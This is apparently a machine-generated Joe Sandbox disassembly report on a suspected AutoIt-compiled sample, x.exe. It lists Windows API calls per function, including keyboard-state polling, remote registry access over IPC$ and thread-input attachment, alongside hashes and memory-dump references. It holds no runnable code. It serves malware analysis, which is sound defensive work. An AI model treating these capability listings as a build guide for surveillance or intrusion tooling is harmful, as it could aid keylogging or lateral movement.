• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
• String ID: 2
• API String ID: 1331449709-450215437
• Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
• Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
• Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
• Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
APIs
• GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
• __swprintf.LIBCMT ref: 00460915
• __swprintf.LIBCMT ref: 0046092D
• _wprintf.LIBCMT ref: 004609E1
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
• API String ID: 3054410614-2561132961
• Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
• Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
• Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
• Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
• CLSIDFromString.OLE32(?,?), ref: 004587B3
• RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
• RegCloseKey.ADVAPI32(?), ref: 004587C5
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                    • API String ID: 600699880-22481851
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: DestroyWindow
• String ID: static
• API String ID: 3375834691-2160076837
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D959
• GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
• API String ID: 2907320926-3566645568
APIs
  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
• DestroyAcceleratorTable.USER32(?), ref: 0047094A
• ImageList_Destroy.COMCTL32(?), ref: 004709AD
• ImageList_Destroy.COMCTL32(?), ref: 004709C5
• ImageList_Destroy.COMCTL32(?), ref: 004709D5
• DeleteObject.GDI32(00000000), ref: 00470A04
• DestroyIcon.USER32(00000000), ref: 00470A1C
• DeleteObject.GDI32(20FB9A13), ref: 00470A34
• DestroyWindow.USER32(00000000), ref: 00470A4C
• DestroyIcon.USER32(?), ref: 00470A73
• DestroyIcon.USER32(?), ref: 00470A81
• KillTimer.USER32(00000000,00000000), ref: 00470B00
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
• String ID:
• API String ID: 1237572874-0
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
• SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
• VariantInit.OLEAUT32(?), ref: 004793E1
• SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
• VariantCopy.OLEAUT32(?,?), ref: 00479461
• SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
• VariantClear.OLEAUT32(?), ref: 00479489
• SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
• SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
• VariantClear.OLEAUT32(?), ref: 004794CA
• SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
APIs
• GetKeyboardState.USER32(?), ref: 0044480E
• GetAsyncKeyState.USER32(000000A0), ref: 00444899
• GetKeyState.USER32(000000A0), ref: 004448AA
• GetAsyncKeyState.USER32(000000A1), ref: 004448C8
• GetKeyState.USER32(000000A1), ref: 004448D9
• GetAsyncKeyState.USER32(00000011), ref: 004448F5
• GetKeyState.USER32(00000011), ref: 00444903
• GetAsyncKeyState.USER32(00000012), ref: 0044491F
• GetKeyState.USER32(00000012), ref: 0044492D
• GetAsyncKeyState.USER32(0000005B), ref: 00444949
• GetKeyState.USER32(0000005B), ref: 00444958
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
                                                                                                                                                    • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                                                    • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                                                                                                    • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                                                    • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: InitVariant$_malloc_wcscpy_wcslen
• String ID:
• API String ID: 3413494760-0
• Opcode ID: 16f8fa2627d0cf4fc500c06a07b70b857d3e661ade40dc31cc78a2c5b3600a28
• Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
• Opcode Fuzzy Hash: 16f8fa2627d0cf4fc500c06a07b70b857d3e661ade40dc31cc78a2c5b3600a28
• Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: AddressProc_free_malloc$_strcat_strlen
• String ID: AU3_FreeVar
• API String ID: 2634073740-771828931
• Opcode ID: 923fa0a7059ff83e982d885d87b1b243233484feeca3d047820b52f06f013e18
• Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
• Opcode Fuzzy Hash: 923fa0a7059ff83e982d885d87b1b243233484feeca3d047820b52f06f013e18
• Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
APIs
• CoInitialize.OLE32 ref: 0046C63A
• CoUninitialize.OLE32 ref: 0046C645
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
  • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
• CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
• CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
• CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
• IIDFromString.OLE32(?,?), ref: 0046C705
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 2294789929-1287834457
• Opcode ID: 8b80c77c2bdaea75eec11ce758cd2f9ec9f4a29dfe234f2e260ca4a41de31459
• Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
• Opcode Fuzzy Hash: 8b80c77c2bdaea75eec11ce758cd2f9ec9f4a29dfe234f2e260ca4a41de31459
• Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
APIs
  • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
  • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
• DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
• ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
• ImageList_EndDrag.COMCTL32 ref: 00471169
• ReleaseCapture.USER32 ref: 0047116F
• SetWindowTextW.USER32(?,00000000), ref: 00471206
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
• String ID: @GUI_DRAGFILE$@GUI_DROPID
• API String ID: 2483343779-2107944366
• Opcode ID: 8242c973631ce46dc2107a793a2d3124409766f4a4f9f3ff38e174e62d65e23e
• Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
• Opcode Fuzzy Hash: 8242c973631ce46dc2107a793a2d3124409766f4a4f9f3ff38e174e62d65e23e
• Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
• SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
• _wcslen.LIBCMT ref: 00450720
• _wcscat.LIBCMT ref: 00450733
• SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
• SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
Strings
Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                                                                    • String ID: -----$SysListView32
                                                                                                                                                    • API String ID: 4008455318-3975388722
                                                                                                                                                    • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                                                    • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                                                                                    • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                                                    • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
APIs
• Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
• Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
• GetDlgCtrlID.USER32(00000000), ref: 00469C84
• GetParent.USER32 ref: 00469C98
• SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
• GetDlgCtrlID.USER32(00000000), ref: 00469CA5
• GetParent.USER32 ref: 00469CBC
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: MessageSend$CtrlParent$_memmove_wcslen
• String ID: ComboBox$ListBox
• API String ID: 2360848162-1403004172
APIs
Similarity
• API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
• String ID:
• API String ID: 262282135-0
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
• GetWindowLongW.USER32(?,000000F0), ref: 004481CF
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
• SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
• SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
• SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
• SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
• SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 00434643
• GetForegroundWindow.USER32(00000000), ref: 00434655
• GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
• GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
Strings
Similarity
• API ID:
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 0-1603158881
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
• DestroyWindow.USER32(?), ref: 00426F50
• UnregisterHotKey.USER32(?), ref: 00426F77
• FreeLibrary.KERNEL32(?), ref: 0042701F
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
Strings
Similarity
• API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
• String ID: close all$Wu
• API String ID: 4174999648-1790509019
APIs
• CreateMenu.USER32 ref: 00448603
• SetMenu.USER32(?,00000000), ref: 00448613
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
• IsMenu.USER32(?), ref: 004486AB
• CreatePopupMenu.USER32 ref: 004486B5
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
• DrawMenuBar.USER32 ref: 004486F5
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup
• String ID: 0
• API String ID: 161812096-4108050209
• Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
• Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
• Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
• Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
APIs
• GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\AppData\Local\Temp\x.exe), ref: 00434057
• LoadStringW.USER32(00000000), ref: 00434060
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
• LoadStringW.USER32(00000000), ref: 00434078
• _wprintf.LIBCMT ref: 004340A1
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
Strings
• C:\Users\user\AppData\Local\Temp\x.exe, xrefs: 00434040
• %s (%d) : ==> %s: %s %s, xrefs: 0043409C
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\AppData\Local\Temp\x.exe
• API String ID: 3648134473-3922646890
• Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
• Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
• Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
• Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 78813ac5c5779212d88e11dbc4805cbe96c27163f172e50d1cd09915c6bfa1a3
• Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
• Opcode Fuzzy Hash: 78813ac5c5779212d88e11dbc4805cbe96c27163f172e50d1cd09915c6bfa1a3
